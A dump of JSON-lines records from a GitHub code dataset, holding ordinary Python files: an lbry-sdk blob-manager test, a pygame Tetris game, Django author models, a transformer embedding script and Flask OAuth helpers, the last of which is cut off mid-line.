self.assertEqual(self.blob_manager.is_blob_verified(blob_hash), save_blobs)\n\n async def test_sync_blob_file_manager_on_startup(self):\n await self.setup_blob_manager(save_blobs=True)\n\n # add a blob file\n blob_hash = \"7f5ab2def99f0ddd008da71db3a3772135f4002b19b7605840ed1034c8955431bd7079549e65e6b2a3b9c17c773073ed\"\n blob_bytes = b'1' * ((2 * 2 ** 20) - 1)\n with open(os.path.join(self.blob_manager.blob_dir, blob_hash), 'wb') as f:\n f.write(blob_bytes)\n\n # it should not have been added automatically on startup\n\n await self.blob_manager.setup()\n self.assertSetEqual(self.blob_manager.completed_blob_hashes, set())\n\n # make sure we can add the blob\n await self.blob_manager.blob_completed(self.blob_manager.get_blob(blob_hash, len(blob_bytes)))\n self.assertSetEqual(self.blob_manager.completed_blob_hashes, {blob_hash})\n\n # stop the blob manager and restart it, make sure the blob is there\n self.blob_manager.stop()\n self.assertSetEqual(self.blob_manager.completed_blob_hashes, set())\n await self.blob_manager.setup()\n self.assertSetEqual(self.blob_manager.completed_blob_hashes, {blob_hash})\n\n # test that the blob is removed upon the next startup after the file being manually deleted\n self.blob_manager.stop()\n\n # manually delete the blob file and restart the blob manager\n os.remove(os.path.join(self.blob_manager.blob_dir, blob_hash))\n await self.blob_manager.setup()\n self.assertSetEqual(self.blob_manager.completed_blob_hashes, set())\n\n # check that the deleted blob was updated in the database\n self.assertEqual(\n 'pending', (\n await self.storage.run_and_return_one_or_none('select status from blob where blob_hash=?', blob_hash)\n )\n )\n","repo_name":"lbryio/lbry-sdk","sub_path":"tests/unit/blob/test_blob_manager.py","file_name":"test_blob_manager.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":7218,"dataset":"github-code","pt":"53"} +{"seq_id":"8543371384","text":"from read import Read\n\nlst = []\ndict = {}\n\nwhile True:\n\tkey = Read(str, 'Key')\n\tif key.lower() == 'done':\n\t\tbreak\n\tvalue = Read(str, 'Value(s)').split()\n\tlst.append((key, value))\n\nprint(lst)\n\nfor i, j in lst:\n\tdict[i] = j\n\nprint(dict)\n","repo_name":"N-eeraj/perfect_plan_b","sub_path":"tuple-list.py","file_name":"tuple-list.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25483536088","text":"import unittest\n\nfrom lost_hat_smoke_tests import LostHatSmokeTests\nfrom unittest.loader import makeSuite\n\n\ndef smoke_suite():\n test_suite = unittest.TestSuite()\n # adding test classes:\n test_suite.addTest(makeSuite(LostHatSmokeTests)) # wszystkie testy z tej klasy\n return test_suite\n\n\nrunner = unittest.TextTestRunner(verbosity=2)\nsuit = smoke_suite()\nrunner.run(suit)\n\n\n\n\n\n","repo_name":"sympo/jaktestowacDemoTest","sub_path":"testsuite_smoke_tests.py","file_name":"testsuite_smoke_tests.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12588362040","text":"import random, time, pygame, sys\nfrom pygame.locals import *\n\nFPS = 25\nWINDOWWIDTH = 640\nWINDOWHEIGHT = 480\nBOXSIZE = 20\nBOARDWIDTH = 10\nBOARDHEIGHT = 20\nBLANK = '.'\n\nXMARGIN = int((WINDOWWIDTH - BOARDWIDTH * BOXSIZE) / 2)\nTOPMARGIN = WINDOWHEIGHT - (BOARDHEIGHT * BOXSIZE) - 5\n\nMOVESIDEWAYSFREQ = 0.15\nMOVEDOWNFREQ = 0.1\n\nWHITE = (255, 255, 255)\nGRAY = (185, 185, 185)\nBLACK = (0, 0, 0)\nLIGHTRED = (255, 0, 0)\nRED = (200, 20, 20)\nLIGHTGREEN = (0, 255, 0)\nGREEN = (20, 185, 20)\nLIGHTBLUE = (0, 0, 255)\nBLUE = (20, 20, 200)\nLIGHTYELLOW = (255, 255, 0)\nYELLOW = (200, 200, 20)\nLIGHTPURPLE = (162, 0, 124)\nPURPLE = (120, 0, 98)\nLIGHTPINK = (223, 53, 57)\nPINK = (200, 46, 49)\n\nBORDERCOLOR = WHITE # màu viền khung\nBGCOLOR = BLACK # màu nền khung\nTEXTCOLOR = WHITE # màu chữ hiển thị trên màn hình\nTEXTSHADOWCOLOR = GRAY # màu bóng chữ hiển thị\nCOLORS = (BLUE, GREEN, RED, YELLOW, PURPLE, PINK, GRAY)\nLIGHTCOLORS = (LIGHTBLUE, LIGHTGREEN, LIGHTRED, LIGHTYELLOW, LIGHTPURPLE, LIGHTPINK, WHITE)\nassert len(COLORS) == len(LIGHTCOLORS) # mỗi một color phải có 1 light color\nTEMPLATEWIDTH = 5\nTEMPLATEHEIGHT = 5\nS_SHAPE_TEMPLATE = [['.....',\n '.....',\n '..OO.',\n '.OO..',\n '.....'],\n ['.....',\n '..O..',\n '..OO.',\n '...O.',\n '.....']]\nZ_SHAPE_TEMPLATE = [['.....',\n '.....',\n '.OO..',\n '..OO.',\n '.....'],\n ['.....',\n '..O..',\n '.OO..',\n '.O...',\n '.....']]\nI_SHAPE_TEMPLATE = [['..O..',\n '..O..',\n '..O..',\n '..O..',\n '.....'],\n ['.....',\n '.....',\n 'OOOO.',\n '.....',\n '.....']]\nO_SHAPE_TEMPLATE = [['.....',\n '.....',\n '.OO..',\n '.OO..',\n '.....']]\nJ_SHAPE_TEMPLATE = [['.....',\n '.O...',\n '.OOO.',\n '.....',\n '.....'],\n ['.....',\n '..OO.',\n '..O..',\n '..O..',\n '.....'],\n ['.....',\n '.....',\n '.OOO.',\n '...O.',\n '.....'],\n ['.....',\n '..O..',\n '..O..',\n '.OO..',\n '.....']]\nL_SHAPE_TEMPLATE = [['.....',\n '...O.',\n '.OOO.',\n '.....',\n '.....'],\n ['.....',\n '..O..',\n '..O..',\n '..OO.',\n '.....'],\n ['.....',\n '.....',\n '.OOO.',\n '.O...',\n '.....'],\n ['.....',\n '.OO..',\n '..O..',\n '..O..',\n '.....']]\nT_SHAPE_TEMPLATE = [['.....',\n '..O..',\n '.OOO.',\n '.....',\n '.....'],\n ['.....',\n '..O..',\n '..OO.',\n '..O..',\n '.....'],\n ['.....',\n '.....',\n '.OOO.',\n '..O..',\n '.....'],\n ['.....',\n '..O..',\n '.OO..',\n '..O..',\n '.....']]\nSHAPES = {'S': S_SHAPE_TEMPLATE,\n 'Z': Z_SHAPE_TEMPLATE,\n 'J': J_SHAPE_TEMPLATE,\n 'L': L_SHAPE_TEMPLATE,\n 'I': I_SHAPE_TEMPLATE,\n 'O': O_SHAPE_TEMPLATE,\n 'T': T_SHAPE_TEMPLATE}\n\ndef updateScore(nscore):\n score = maxScore()\n with open('scores.txt', 'w') as f:\n if int(score) > nscore:\n f.write(str(score))\n else:\n f.write(str(nscore))\n\ndef maxScore():\n with open('scores.txt', 'r') as f:\n lines = f.readlines()\n score = lines[0].strip()\n return score\n\ndef main():\n global FPSCLOCK, DISPLAYSURF, BASICFONT, BIGFONT\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n BASICFONT = pygame.font.SysFont('Cooper Black', 17)\n BIGFONT = pygame.font.SysFont('comicsans', 100)\n pygame.display.set_caption('Tetromino')\n showTextScreen('Tetromino')\n\n icon = pygame.image.load('tetris.png')\n pygame.display.set_icon(icon)\n\n while True: # game loop\n #pygame.mixer.music.load('tetris_BGMUSIC.mp3')\n #pygame.mixer.music.play(-1, 0.0)\n runGame()\n #pygame.mixer.music.stop()\n showTextScreen('Game Over')\n\ndef runGame():\n # setup variables for the start of the game\n background = pygame.image.load('tetris_bg.jpg')\n board = getBlankBoard()\n lastMoveDownTime = time.time()\n lastMoveSidewaysTime = time.time()\n lastFallTime = time.time()\n movingDown = False\n movingLeft = False\n movingRight = False\n score = 0\n level, fallFreq = calculateLevelAndFallFreq(score)\n\n fallingPiece = getNewPiece()\n nextPiece = getNewPiece()\n\n while True: # main game loop\n if fallingPiece == None:\n # khi ko có piece nào rơi xuống, bắt đầu một piece khác\n fallingPiece = nextPiece\n nextPiece = getNewPiece()\n lastFallTime = time.time() # đặt lại lastFallTime\n if not isValidPosition(board, fallingPiece):\n return #game kết thúc khi ko còn chỗ chứa piece tiếp theo\n\n checkForQuit()\n updateScore(score)\n for event in pygame.event.get(): # vòng lặp xl sự kiện\n if event.type == KEYUP:\n if (event.key == K_p):\n pygame.mixer.music.stop()\n showTextScreen('Paused')\n pygame.mixer.music.play(-1, 0.0)\n lastFallTime = time.time()\n lastMoveDownTime = time.time()\n lastMoveSidewaysTime = time.time()\n elif (event.key == K_LEFT):\n movingLeft = False\n elif (event.key == K_RIGHT):\n movingRight = False\n elif (event.key == K_DOWN):\n movingDown = False\n\n elif event.type == KEYDOWN:\n if (event.key == K_LEFT) and isValidPosition(board, fallingPiece, adjX=-1):\n fallingPiece['x'] -= 1\n movingLeft = True\n movingRight = False\n lastMoveSidewaysTime = time.time()\n elif (event.key == K_RIGHT) and isValidPosition(board, fallingPiece, adjX=1):\n fallingPiece['x'] += 1\n movingRight = True\n movingLeft = False\n lastMoveSidewaysTime = time.time()\n\n # rotating the block (if there is room to rotate)\n elif (event.key == K_UP):\n fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(SHAPES[fallingPiece['shape']])\n if not isValidPosition(board, fallingPiece):\n fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(SHAPES[fallingPiece['shape']])\n\n # making the block fall faster with the down key\n elif (event.key == K_DOWN):\n movingDown = True\n if isValidPosition(board, fallingPiece, adjY=1):\n fallingPiece['y'] += 1\n lastMoveDownTime = time.time()\n # move the current block all the way down\n elif event.key == K_SPACE:\n movingDown = False\n movingLeft = False\n movingRight = False\n for i in range(1, BOARDHEIGHT):\n if not isValidPosition(board, fallingPiece, adjY=i):\n break\n fallingPiece['y'] += i - 1\n\n # di chuyển bằng nhấn giữ phím\n if (movingLeft or movingRight) and time.time() - lastMoveSidewaysTime > MOVESIDEWAYSFREQ:\n if movingLeft and isValidPosition(board, fallingPiece, adjX=-1):\n fallingPiece['x'] -= 1\n elif movingRight and isValidPosition(board, fallingPiece, adjX=1):\n fallingPiece['x'] += 1\n lastMoveSidewaysTime = time.time()\n\n if movingDown and time.time()-lastMoveDownTime>MOVEDOWNFREQ and isValidPosition(board,fallingPiece,adjY=1):\n fallingPiece['y'] += 1\n lastMoveDownTime = time.time()\n\n # let the piece fall if it is time to fall\n if time.time() - lastFallTime > fallFreq:\n if not isValidPosition(board, fallingPiece, adjY=1):\n # nếu fallingPiece đã rơi xuống đáy, cập nhật vào board\n addToBoard(board, fallingPiece)\n score += removeCompleteLines(board)\n level, fallFreq = calculateLevelAndFallFreq(score)\n fallingPiece = None\n else: # nếu ko tiếp tục di chuyển xuống\n fallingPiece['y'] += 1\n lastFallTime = time.time()\n # drawing everything on the screen\n DISPLAYSURF.blit(background, (0, 0))\n drawBoard(board)\n drawGrid()\n lastScore = maxScore()\n drawStatus(score, level, lastScore)\n drawNextPiece(nextPiece)\n if fallingPiece != None:\n drawPiece(fallingPiece)\n\n pygame.display.update()\n FPSCLOCK.tick(FPS)\n\ndef makeTextObjs(text, font, color):\n surf = font.render(text, True, color)\n return surf, surf.get_rect()\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\ndef checkForKeyPress():\n checkForQuit()\n for event in pygame.event.get([KEYDOWN, KEYUP]):\n if event.type == KEYDOWN:\n continue\n return event.key\n return None\n\ndef showTextScreen(text):\n # vẽ bóng đổ cho chữ to\n titleSurf, titleRect = makeTextObjs(text, BIGFONT, TEXTSHADOWCOLOR)\n titleRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2))\n DISPLAYSURF.blit(titleSurf, titleRect)\n # vẽ dòng chữ to ở center\n titleSurf, titleRect = makeTextObjs(text, BIGFONT, WHITE)\n titleRect.center = (int(WINDOWWIDTH / 2) - 3, int(WINDOWHEIGHT / 2) - 3)\n DISPLAYSURF.blit(titleSurf, titleRect)\n # vẽ dòng chữp hía dưới\n font = pygame.font.SysFont('comicsans', 40)\n pressKeySurf, pressKeyRect = makeTextObjs('Press Any Key To Play.', font, LIGHTYELLOW)\n pressKeyRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2) + 100)\n DISPLAYSURF.blit(pressKeySurf, pressKeyRect)\n\n while checkForKeyPress() == None:\n pygame.display.update()\n FPSCLOCK.tick()\n\ndef checkForQuit():\n for event in pygame.event.get(QUIT):\n terminate()\n for event in pygame.event.get(KEYUP):\n if event.key == K_ESCAPE:\n terminate()\n pygame.event.post(event)\n\ndef calculateLevelAndFallFreq(score):\n level = int(score / 10) + 1\n fallFreq = 0.27 - (level * 0.01)\n return level, fallFreq\n\ndef getNewPiece():\n shape = random.choice(list(SHAPES.keys()))\n newPiece = {'shape': shape,\n 'rotation': random.randint(0, len(SHAPES[shape]) - 1),\n 'x': int(BOARDWIDTH / 2) - int(TEMPLATEWIDTH / 2),\n 'y': -2, # xuất hiện trên giữa đầu board\n 'color': random.randint(0, len(COLORS) - 1)}\n return newPiece\n\ndef addToBoard(board, piece):\n for x in range(TEMPLATEWIDTH):\n for y in range(TEMPLATEHEIGHT):\n if SHAPES[piece['shape']][piece['rotation']][y][x] != BLANK:\n board[x + piece['x']][y + piece['y']] = piece['color']\n\ndef getBlankBoard():\n board = []\n for i in range(BOARDWIDTH):\n board.append([BLANK] * BOARDHEIGHT)\n return board\n\ndef isOnBoard(x, y):\n return x >= 0 and x < BOARDWIDTH and y < BOARDHEIGHT\n\ndef isValidPosition(board, piece, adjX=0, adjY=0):\n for x in range(TEMPLATEWIDTH):\n for y in range(TEMPLATEHEIGHT):\n isAboveBoard = y + piece['y'] + adjY < 0\n if isAboveBoard or SHAPES[piece['shape']][piece['rotation']][y][x] == BLANK:\n continue\n if not isOnBoard(x + piece['x'] + adjX, y + piece['y'] + adjY):\n return False\n if board[x + piece['x'] + adjX][y + piece['y'] + adjY] != BLANK:\n return False\n return True\n\ndef isCompleteLine(board, y):\n for x in range(BOARDWIDTH):\n if board[x][y] == BLANK:\n return False\n return True\n\ndef removeCompleteLines(board):\n numLinesRemoved = 0 # số hàng phải xóa\n y = BOARDHEIGHT - 1\n while y >= 0:\n if isCompleteLine(board, y):\n # xóa hàng và di chuyển các box xuống\n for pullDownY in range(y, 0, -1):\n for x in range(BOARDWIDTH):\n board[x][pullDownY] = board[x][pullDownY - 1]\n board[x][0] = BLANK\n numLinesRemoved += 1\n else:\n y -= 1\n return numLinesRemoved\n\ndef convertToPixelCoords(boxx, boxy):\n return (XMARGIN + (boxx * BOXSIZE)), (TOPMARGIN + (boxy * BOXSIZE))\n\ndef drawBox(boxx, boxy, color, pixelx=None, pixely=None):\n if color == BLANK:\n return\n if pixelx == None and pixely == None:\n pixelx, pixely = convertToPixelCoords(boxx, boxy)\n pygame.draw.rect(DISPLAYSURF, COLORS[color], (pixelx + 1, pixely + 1, BOXSIZE - 1, BOXSIZE - 1))\n pygame.draw.rect(DISPLAYSURF, LIGHTCOLORS[color], (pixelx + 1, pixely + 1, BOXSIZE - 4, BOXSIZE - 4))\n\ndef drawBoard(board):\n pygame.draw.rect(DISPLAYSURF, BORDERCOLOR, (XMARGIN, TOPMARGIN, (BOARDWIDTH * BOXSIZE), (BOARDHEIGHT * BOXSIZE)),10)\n pygame.draw.rect(DISPLAYSURF, BGCOLOR, (XMARGIN, TOPMARGIN, BOXSIZE * BOARDWIDTH, BOXSIZE * BOARDHEIGHT))\n for x in range(BOARDWIDTH):\n for y in range(BOARDHEIGHT):\n drawBox(x, y, board[x][y])\n\ndef drawStatus(score, level, lastScore):\n pygame.draw.rect(DISPLAYSURF, BORDERCOLOR, (475, 10, 150, 225), 5)\n pygame.draw.rect(DISPLAYSURF, BGCOLOR, (475, 10, 150, 225))\n # draw the score text\n scoreSurf = BASICFONT.render('Score: %s' % score, True, TEXTCOLOR)\n scoreRect = scoreSurf.get_rect()\n scoreRect.topleft = (WINDOWWIDTH - 150, 20)\n DISPLAYSURF.blit(scoreSurf, scoreRect)\n # draw the level text\n levelSurf = BASICFONT.render('Level: %s' % level, True, TEXTCOLOR)\n levelRect = levelSurf.get_rect()\n levelRect.topleft = (WINDOWWIDTH - 150, 50)\n DISPLAYSURF.blit(levelSurf, levelRect)\n # draw the highscore\n highcoreSurf = BASICFONT.render('High Score: ' + lastScore, True, TEXTCOLOR)\n highcorect = highcoreSurf.get_rect()\n highcorect.topleft = (WINDOWWIDTH - 150, 200)\n DISPLAYSURF.blit(highcoreSurf, highcorect)\n\ndef drawPiece(piece, pixelx=None, pixely=None):\n shapeToDraw = SHAPES[piece['shape']][piece['rotation']]\n if pixelx == None and pixely == None:\n pixelx, pixely = convertToPixelCoords(piece['x'], piece['y'])\n for x in range(TEMPLATEWIDTH):\n for y in range(TEMPLATEHEIGHT):\n if shapeToDraw[y][x] != BLANK:\n drawBox(None, None, piece['color'], pixelx + (x * BOXSIZE), pixely + (y * BOXSIZE))\n\ndef drawNextPiece(piece):\n # chữ Next Shape\n nextSurf = BASICFONT.render('Next Shape:', True, TEXTCOLOR)\n nextRect = nextSurf.get_rect()\n nextRect.topleft = (WINDOWWIDTH - 150, 80)\n DISPLAYSURF.blit(nextSurf, nextRect)\n # vẽ next piece\n drawPiece(piece, pixelx=WINDOWWIDTH - 120, pixely=100)\n\ndef drawGrid():\n for i in range(BOARDHEIGHT):\n pygame.draw.line(DISPLAYSURF, (33, 21, 81), (XMARGIN, TOPMARGIN + i * BOXSIZE),\n (XMARGIN + 200, TOPMARGIN + i * BOXSIZE))\n for j in range(BOARDWIDTH):\n pygame.draw.line(DISPLAYSURF, (33, 21, 81), (XMARGIN + j * BOXSIZE, TOPMARGIN),\n (XMARGIN + j * BOXSIZE, TOPMARGIN + 400))\n\nif __name__ == '__main__':\n main()\n","repo_name":"DavidYate/tetris_game_python","sub_path":"Tetris.py","file_name":"Tetris.py","file_ext":"py","file_size_in_byte":16718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22192146238","text":"from django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.utils.translation import gettext_lazy as _\n\nfrom apps.core.models import BaseModel, Person\nfrom apps.library.models.play import ProgramType\n\n\nclass Author(BaseModel):\n person = models.OneToOneField(\n Person,\n on_delete=models.CASCADE,\n verbose_name=\"Человек\",\n related_name=\"authors\",\n )\n quote = models.CharField(\n max_length=200,\n verbose_name=\"Цитата\",\n )\n biography = models.TextField(\n max_length=3000,\n verbose_name=\"Текст про автора\",\n )\n plays = models.ManyToManyField(\n \"library.Play\",\n related_name=\"authors\",\n blank=True,\n verbose_name=\"Пьесы автора\",\n through=\"AuthorPlay\",\n )\n slug = models.SlugField(\n \"Транслит фамилии для формирования адресной строки\",\n unique=True,\n help_text=\"Формируется автоматически, может быть изменен вручную\",\n error_messages={\"unique\": \"Такой транслит уже используется, введите иной\"},\n )\n\n class Meta:\n ordering = (\"person__last_name\",)\n verbose_name = \"Автор\"\n verbose_name_plural = \"Авторы\"\n\n def __str__(self):\n return f\"{self.person.last_name} {self.person.first_name}\"\n\n def save(self, *args, **kwargs):\n self.full_clean()\n return super().save(*args, **kwargs)\n\n def _has_person_before_saving(self):\n return self.person_id is not None\n\n @property\n def image(self):\n return self.person.image\n\n @property\n def achievements(self):\n \"\"\"Get queryset with info about achievements.\"\"\"\n return (\n ProgramType.objects.filter(plays__authors=self)\n .order_by(\"-plays__festival__year\", \"name\")\n .distinct(\"plays__festival__year\", \"name\")\n .values(\"id\", \"name\", \"plays__festival__year\")\n )\n\n\nclass AuthorPlay(models.Model):\n author = models.ForeignKey(\n Author,\n on_delete=models.RESTRICT,\n related_name=\"author_plays\",\n verbose_name=\"Автор\",\n )\n play = models.ForeignKey(\n \"library.Play\",\n on_delete=models.CASCADE,\n related_name=\"author_plays\",\n verbose_name=\"Пьеса\",\n )\n order = models.PositiveSmallIntegerField(\n default=0,\n verbose_name=\"Порядковый номер пьесы у автора\",\n )\n\n class Meta:\n verbose_name = \"Отношение Автор-Пьеса\"\n verbose_name_plural = \"Отношения Автор-Пьеса\"\n ordering = (\"order\",)\n\n def __str__(self):\n return f\"Пьеса {self.play} - автор {self.author}\"\n\n def save(self):\n if AuthorPlay.objects.filter(author=self.author, play=self.play) and self.id is None:\n return\n return super().save()\n\n def clean(self):\n if AuthorPlay.objects.filter(~Q(id=self.id), author=self.author, play=self.play) and self.id is not None:\n raise ValidationError(\"Такая Пьеса уже есть у данного Автора\")\n return super().clean()\n\n\nclass SocialNetworkLink(BaseModel):\n class SocialNetwork(models.TextChoices):\n FACEBOOK = \"fb\", _(\"Facebook\")\n INSTAGRAM = \"inst\", _(\"Instagram\")\n YOUTUBE = \"ytube\", _(\"YouTube\")\n TELEGRAM = \"tlgrm\", _(\"Telegram\")\n VKONTAKTE = \"vk\", _(\"Вконтакте\")\n\n author = models.ForeignKey(\n Author,\n on_delete=models.CASCADE,\n related_name=\"social_networks\",\n verbose_name=\"Автор\",\n )\n name = models.CharField(\n max_length=200,\n choices=SocialNetwork.choices,\n verbose_name=\"Название\",\n )\n link = models.URLField(\n max_length=500,\n verbose_name=\"Ссылка\",\n )\n\n class Meta:\n verbose_name = \"Ссылка на социальную сеть\"\n verbose_name_plural = \"Ссылки на социальные сети\"\n constraints = (\n models.UniqueConstraint(\n fields=(\n \"author\",\n \"name\",\n ),\n name=\"unique_social_network\",\n ),\n )\n\n def __str__(self):\n return self.name\n\n\nclass OtherLink(BaseModel):\n author = models.ForeignKey(\n Author,\n related_name=\"other_links\",\n on_delete=models.CASCADE,\n verbose_name=\"Автор\",\n )\n name = models.CharField(\n max_length=200,\n verbose_name=\"Название\",\n )\n link = models.URLField(\n max_length=500,\n verbose_name=\"Ссылка\",\n )\n is_pinned = models.BooleanField(\n verbose_name=\"Закрепить ссылку\",\n help_text=\"Закрепить ссылку вверху страницы?\",\n )\n order = models.PositiveSmallIntegerField(\n default=0,\n verbose_name=\"Порядок\",\n help_text=\"Указывается для формирования порядка вывода информации\",\n )\n\n class Meta:\n ordering = (\"order\",)\n verbose_name = \"Публикации и другие материалы\"\n verbose_name_plural = \"Публикации и другие материалы\"\n constraints = (\n models.UniqueConstraint(\n fields=(\n \"author\",\n \"name\",\n ),\n name=\"unique_link\",\n ),\n )\n\n def __str__(self):\n return self.name\n","repo_name":"Studio-Yandex-Practicum/Lubimovka_backend","sub_path":"apps/library/models/author.py","file_name":"author.py","file_ext":"py","file_size_in_byte":5790,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"38851700871","text":"#!/usr/bin/python3\n\nimport requests\nimport json\n\napi_url = \"http://compras.dados.gov.br/licitacoes/v1/licitacoes.json\"\n\ndef get_all():\n response = requests.get(api_url)\n if (response.status_code != 200):\n print(\"ERROR:{}\".format(response))\n return response.json()[\"_embedded\"][\"licitacoes\"]\n\nlicitacoes = get_all()\n\nfor licitacao in licitacoes:\n id = licitacao[\"identificador\"]\n print(id)","repo_name":"mmoraesbr/kotlin-coroutine-benchmark","sub_path":"jmeter/create-csv.py","file_name":"create-csv.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"29133476102","text":"from __future__ import annotations\n\nimport argparse\nimport json\nimport os\n\nimport torch\nimport tqdm\nfrom torch.utils.data import DataLoader\nfrom transformers import AutoModel, AutoTokenizer, DataCollatorWithPadding\n\nfrom data import TextDataset\n\n\ndef prepare_dataset(args: argparse.Namespace) -> tuple[list[str], DataLoader]:\n # Read the notebooks and extract all texts with their notebook names.\n names, texts = [], []\n for filename in tqdm.tqdm(os.listdir(args.notebook_dir)):\n name = os.path.splitext(filename)[0]\n with open(os.path.join(args.notebook_dir, filename)) as fp:\n notebook = json.load(fp)\n for text in notebook[\"source\"].values():\n names.append(name)\n texts.append(\" \".join(text.split()))\n\n tokenizer = AutoTokenizer.from_pretrained(args.model)\n dataloader = DataLoader(\n TextDataset(texts, tokenizer, args.max_length),\n batch_size=args.batch_size,\n num_workers=args.num_workers or os.cpu_count(),\n collate_fn=DataCollatorWithPadding(tokenizer, pad_to_multiple_of=8),\n persistent_workers=True,\n )\n return names, dataloader\n\n\n@torch.inference_mode()\ndef main(args: argparse.Namespace):\n os.makedirs(args.output_dir, exist_ok=True)\n\n # Prepare the dataset and pretrained model.\n names, dataloader = prepare_dataset(args)\n model = AutoModel.from_pretrained(args.model).cuda().eval()\n model.to(torch.float16 if args.use_fp16 else torch.float32)\n\n index, embeddings = 0, []\n for batch in tqdm.tqdm(dataloader):\n # Move the batch tensors to CUDA memory.\n batch = {k: v.cuda() for k, v in batch.items()}\n for embedding in model(**batch).last_hidden_state[:, 0]:\n if index > 0 and names[index - 1] != names[index]:\n # If generating the sentence embeddings in the current notebook is done,\n # then we will gather the embeddings for saving to the file, and clear\n # the embedding buffer for new notebook cells.\n filename = os.path.join(args.output_dir, f\"{names[index - 1]}.pt\")\n torch.save(torch.stack(embeddings), filename)\n embeddings = []\n embeddings.append(embedding)\n index += 1\n\n # Save the last notebook embeddings if the embedding buffer is not empty.\n if embeddings:\n filename = os.path.join(args.output_dir, f\"{names[-1]}.pt\")\n torch.save(torch.stack(embeddings), filename)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"model\")\n parser.add_argument(\"--notebook-dir\", default=\"resources/ai4code/train_cleaned\")\n parser.add_argument(\"--output-dir\", default=\"embeddings\")\n parser.add_argument(\"--max-length\", type=int, default=128)\n parser.add_argument(\"--batch-size\", type=int, default=4096)\n parser.add_argument(\"--num-workers\", type=int, default=os.cpu_count())\n parser.add_argument(\"--use-fp16\", default=False, action=\"store_true\")\n main(parser.parse_args())\n","repo_name":"affjljoo3581/Google-AI4Code-Understand-Code-in-Python-Notebooks","sub_path":"stage1/src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"42077115881","text":"import random\nimport string\nfrom werkzeug.utils import redirect\nfrom application import app\nfrom collections import defaultdict\nfrom flask import abort, session, redirect, request, url_for, flash\nfrom functools import wraps\nfrom os import getenv\nfrom performanceplatform.client.admin import AdminAPI\nfrom requests_oauthlib import OAuth2Session\nfrom requests import Timeout, ConnectionError\n\n\nenvironment = app.config.get('ENVIRONMENT', 'development')\n\n\n@app.context_processor\ndef view_helpers():\n return dict(\n user_has_feature=user_has_feature\n )\n\n\ndef requires_authentication(f):\n @wraps(f)\n def verify_user_logged_in(*args, **kwargs):\n if not signed_in(session):\n return redirect(url_for('root'))\n else:\n admin_client = get_admin_client(session)\n kwargs['admin_client'] = admin_client\n return f(*args, **kwargs)\n return verify_user_logged_in\n\n\ndef requires_feature(feature):\n \"\"\"\n Used for application level requests from a client.\n \"\"\"\n def wrap(f):\n\n @wraps(f)\n def verify_user_has_feature(*args, **kwargs):\n\n if not signed_in(session):\n return redirect(url_for('root'))\n\n if user_has_feature(feature, session['oauth_user']):\n return f(*args, **kwargs)\n else:\n return redirect(url_for('root'))\n\n return verify_user_has_feature\n\n return wrap\n\n\ndef api_permission_required(permission=None):\n \"\"\"\n Used for API level requests originating from signonotron.\n \"\"\"\n def decorator(f):\n @wraps(f)\n def verify_api_user_has_permission(*args, **kwargs):\n if permission is None:\n raise Exception('@api_permission_required needs an argument')\n\n access_token = _extract_bearer_token(request)\n\n if access_token is None:\n abort(401, 'no access token given.')\n\n user = _get_user(access_token)\n\n if user is None:\n # This is very unexpected, since we expect the token to come\n # from signonotron. Possibly under attack, or crossing the\n # environments?\n abort(401, 'invalid access token.')\n\n if permission in user['user']['permissions']:\n session['oauth_user'] = user['user']\n session['oauth_token'] = {\n 'access_token': access_token\n }\n return f(*args, **kwargs)\n else:\n abort(403, 'user lacks permission.')\n\n return verify_api_user_has_permission\n\n return decorator\n\n\ndef get_admin_client(session):\n return AdminAPI(app.config['STAGECRAFT_HOST'],\n session['oauth_token']['access_token'])\n\n\ndef base_template_context():\n return {\n 'environment': {\n 'name': environment,\n 'human_name': environment.capitalize()\n }\n }\n\n\ndef signed_in(session):\n return(has_user_with_token(session)\n and not no_access(session['oauth_user']))\n\n\ndef signed_in_no_access(session):\n return(has_user_with_token(session)\n and no_access(session['oauth_user']))\n\n\ndef has_user_with_token(session):\n return('oauth_token' in session\n and 'access_token' in session['oauth_token']\n and 'oauth_user' in session)\n\n\ndef no_access(session_oauth_user):\n return('permissions' not in session_oauth_user\n or 'signin' not in session_oauth_user['permissions'])\n\n\ndef group_by_group(data_sets):\n grouped_data_sets = defaultdict(list)\n for item in data_sets:\n grouped_data_sets[item['data_group']].append(item)\n return grouped_data_sets\n\n\ndef _extract_bearer_token(request):\n auth_header = request.headers.get('Authorization', None)\n if auth_header is None:\n return None\n\n return _get_valid_token(auth_header)\n\n\ndef _get_valid_token(auth_header):\n \"\"\"\n >>> _get_valid_token(u'Bearer some-token') == 'some-token'\n True\n >>> _get_valid_token('Bearer ') is None\n True\n >>> _get_valid_token('Something Else') is None\n True\n \"\"\"\n prefix = 'Bearer '\n if not auth_header.startswith(prefix):\n return None\n\n token = auth_header[len(prefix):]\n return token if len(token) else None\n\n\ndef _get_user(token):\n gds_session = OAuth2Session(\n app.config['SIGNON_OAUTH_ID'],\n token={'access_token': token, 'type': 'Bearer'},\n )\n try:\n user_request = gds_session.get('{0}/user.json'.format(\n app.config['SIGNON_BASE_URL']), timeout=30)\n except (Timeout, ConnectionError):\n abort(500, 'Error connecting to signon service')\n if 